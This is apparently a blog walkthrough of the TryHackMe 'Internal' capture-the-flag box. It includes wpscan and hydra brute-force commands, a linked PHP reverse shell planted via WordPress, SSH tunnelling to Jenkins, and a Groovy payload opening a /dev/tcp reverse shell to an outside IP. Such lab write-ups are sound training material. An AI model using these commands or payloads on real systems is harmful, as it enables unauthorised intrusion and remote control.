THM - Internal
Internal is another fun box on the Offensive Pentesting series on Try Hack me.
This box is not a difficult one. However, it does have a few rabbit holes. It is just long box to complete. I strongly suggest looking at this guide to get you unstuck if you hit a wall.
Starting Off
First off we start off by reading Pre-engagement Briefing and then adding internal.thm to /etc/hosts.
We Know now that we are looking at a Web App, so with that being said lets run a Nmap scan on our target.
Port Scanning
sudo nmap -v -sV -sS -p- -T4 -sC -oN portScan <ip>
We can see from our tcp port scan we can only find port 22 and 80.
Enumerating the web page - Apache httpd 2.4.29
If we visit the webpage, we get the Apache2 Ubuntu Default Page.
Our next step is try and find directories we can navigate too, for this I ran gobuster.
gobuster dir -u internal.thm -w /usr/share/wordlists/dirb/common.txt
We are in luck, we found some interesting directories /phpmyadmin/, /wordpress/ and /blog/
After going through some rabbit holes. I did more research on wordpress and found a useful tool called wpscan. I ran the following:
wpscan --url http://internal.thm/wordpress/
This showed me a readme located at /wordpress/readme.html
Clicking on the login page link, we get a log in page
Trying to enter admin:admin would make it appear that the username admin is correct. I confirmed this as well using:
wpscan --url http://internal.thm/blog -e
Now we just need a login, wpscan also has the cability to brute force logins too.
wpscan --url http://internal.thm/blog/wp-login.php --usernames 'admin' -P /usr/share/wordlists/rockyou.txt
After running the above you will get credentials you need to login.
Obtaining a reverse shell
Like most CTF's at this point, you want to look for a place where you can either upload a file or edit some code.
We can add a PHP reverse shell below. You can find the the code for a php reverse shell here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php.
Copy, paste and edit the IP and Port appropriately. Make sure to set up your netcat listener in your terminal:
nc -lvnp <port>
After you have saved the changes you made and made sure you have a netcat listener ready. Navigate to the webpage you edited, and you will obtain a shell.
Awesome we are in.
The First thing I do when I obtain a shell is navigate through the machine I am in to see what might be left behind.
Navigating to the home directory we find user called Aubreanna. We cannot enter Aubreanna's home directory.
I entered the opt directory to find a file wp-save.txt, cat this file and it reveals the password for Aubrena.
Because we have ssh available, You can ssh to machine with Aubreanna's credentials to get more stable shell.
After getting in with her credentials, we can read read user.txt and get the flag.
SSH Tunneling
Now for the fun part! This CTF leaves a LOT of clues around on which direction you should take(at least I thought so). Looking for the low hanging fruit first to see what we can can't do with Aubreanna's credential.
sudo -l : we can't run anything as sudo, so it looks like we should search for files or upload a linux enumeration script.
Looking at the home directory, there is a file called jenkins.txt
This seemed very promising as this did not turn up on our port scan.
This was very similar an earlier CTF I did on THM. So what we can do is do something called SSH tunneling. We can perform this by running:
ssh -L 4444:localhost:8080 aubreanna@10.10.31.24
Then in your browser, navigate to localhost:4444 and we now have a Jenkins log in page.
Now we are back a page where we have no credentials to enter. I tried googling around for default credentials and using credentials we previously obtained but no luck.
It was pretty safe to guess that admin would be a valid username, so lets try brute forcing another log in for admin. Hydra can be a difficult tool to understand how to use. I suggest using burp to get the details that you need, word for word to input into hydra.
hydra 127.0.0.1 -s 4444 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt
Now we are in.
Now it seems like we need to execute another shell.
Navigating through Jenkins, we find a place where we can run groovy script. Doing a bit of research it's bascially java.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/4242;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
So we get another reverse shell using this method, and we logged in as Jenkins.
Like the previous time I time I got shell, I decided to look at around in directories. Looking in the /opt/ directory we find another txt file with the root credentials.
You will not be able too su root from the current shell if you followed this guide. However, you can just ssh into the machine with the root credentials and then cat the root.txt.
Comments
Post a Comment